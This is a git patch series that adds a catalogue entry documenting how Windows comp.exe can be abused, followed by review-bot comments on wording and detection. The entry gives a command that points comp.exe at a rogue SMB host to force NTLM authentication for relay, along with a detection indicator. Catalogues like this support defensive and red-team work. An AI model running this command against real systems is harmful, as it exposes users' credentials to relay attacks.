From a78e06644114d8dcc730889bdf5d2a4333e854ce Mon Sep 17 00:00:00 2001 From: Kousha Zanjani <36133745+kousha1999@users.noreply.github.com> Date: Tue, 13 Feb 2024 12:17:36 +0330 Subject: [PATCH 1/4] Create Comp.yml --- yml/OSBinaries/Comp.yml | 1 + 1 file changed, 1 insertion(+) create mode 100644 yml/OSBinaries/Comp.yml diff --git a/yml/OSBinaries/Comp.yml b/yml/OSBinaries/Comp.yml new file mode 100644 index 00000000..8b137891 --- /dev/null +++ b/yml/OSBinaries/Comp.yml @@ -0,0 +1 @@ + From d61d79b7c5646ceb860c179cd9c78a7054819c4a Mon Sep 17 00:00:00 2001 From: Kousha Zanjani <36133745+kousha1999@users.noreply.github.com> Date: Tue, 13 Feb 2024 13:38:06 +0330 Subject: [PATCH 2/4] Update Comp.yml --- yml/OSBinaries/Comp.yml | 26 +++++++++++++++++++++++++- 1 file changed, 25 insertions(+), 1 deletion(-) diff --git a/yml/OSBinaries/Comp.yml b/yml/OSBinaries/Comp.yml index 8b137891..a722b8dd 100644 --- a/yml/OSBinaries/Comp.yml +++ b/yml/OSBinaries/Comp.yml @@ -1 +1,25 @@ - +--- +Name: Comp.exe +Description: Used to compares the contents of two files or sets of files byte-by-byte +Author: 'Kousha Zanjani' +Created: 2024-02-13 +Commands: + - Command: comp /M \\10.0.0.10\ fake.txt + Description: Tries to compare a file from rogue SMB Share with a fake.txt file + Usecase: Relay a NTLM authentication + Category: Credentials + Privileges: User + MitreID: T1187 + OperatingSystem: Windows XP, Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 +Full_Path: + - Path: C:\Windows\System32\comp.exe + - Path: C:\Windows\SysWOW64\comp.exe +Code_Sample: + - Code: +Detection: + - IOC: comp.exe retrieving files from remote server +Resources: + - Link: https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/comp +Acknowledgement: + - Person: Kousha Zanjani + Handle: From 0e269e02dc7ad161cff61a3141def0bae3c55656 Mon Sep 17 00:00:00 2001 
From: Kousha Zanjani <36133745+kousha1999@users.noreply.github.com> Date: Tue, 13 Feb 2024 13:45:46 +0330 Subject: [PATCH 3/4] Update Comp.yml - Removing trailing spaces --- yml/OSBinaries/Comp.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/yml/OSBinaries/Comp.yml b/yml/OSBinaries/Comp.yml index a722b8dd..f56100b7 100644 --- a/yml/OSBinaries/Comp.yml +++ b/yml/OSBinaries/Comp.yml @@ -22,4 +22,4 @@ Resources: - Link: https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/comp Acknowledgement: - Person: Kousha Zanjani - Handle: + Handle: From b6e87c1a062df8fe3b139b493f0582df19aa1de5 Mon Sep 17 00:00:00 2001 From: Kousha Zanjani <36133745+kousha1999@users.noreply.github.com> Date: Tue, 13 Feb 2024 14:07:09 +0330 Subject: [PATCH 4/4] Update Comp.yml --- yml/OSBinaries/Comp.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/yml/OSBinaries/Comp.yml b/yml/OSBinaries/Comp.yml index f56100b7..77c09f12 100644 --- a/yml/OSBinaries/Comp.yml +++ b/yml/OSBinaries/Comp.yml @@ -6,7 +6,7 @@ Created: 2024-02-13 Commands: - Command: comp /M \\10.0.0.10\ fake.txt Description: Tries to compare a file from rogue SMB Share with a fake.txt file - Usecase: Relay a NTLM authentication + Usecase: Relay a NTLM authentication over SMB Category: Credentials Privileges: User MitreID: T1187
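Review bot: In [PATCH 2/4], the `Detection` entry `IOC: comp.exe retrieving files from remote server` is too vague for a defender to act on. State an observable instead, for example a comp.exe process whose command line contains a UNC path (`\\`), or comp.exe initiating an outbound SMB connection. In the same hunk, the `Command` value `comp /M \\10.0.0.10\ fake.txt` gives a UNC path with no share or file name, while its Description says a file from an SMB share is compared, so the two should be made consistent. `Code_Sample` carries an empty `Code:` key and should be filled in or dropped. The top-level Description has a grammar slip ("Used to compares"), and "Windows vista" should be capitalised like the other entries in `OperatingSystem`.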
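Review bot: In [PATCH 3/4], the changed line still leaves `Handle:` under `Acknowledgement` with no value once the trailing space is removed. Either supply the handle or drop the key. This whitespace-only fix, and the placeholder file added in [PATCH 1/4] (a single blank line), would be cleaner squashed into the commit that adds the real content.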
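Review bot: In [PATCH 4/4], the new `Usecase: Relay a NTLM authentication over SMB` describes what the remote server does with the authentication rather than what comp.exe itself causes. The entry is tagged `MitreID: T1187` (Forced Authentication), so wording along the lines of "Force an NTLM authentication attempt to a remote SMB server" would match the tag. Also, "a NTLM" should read "an NTLM".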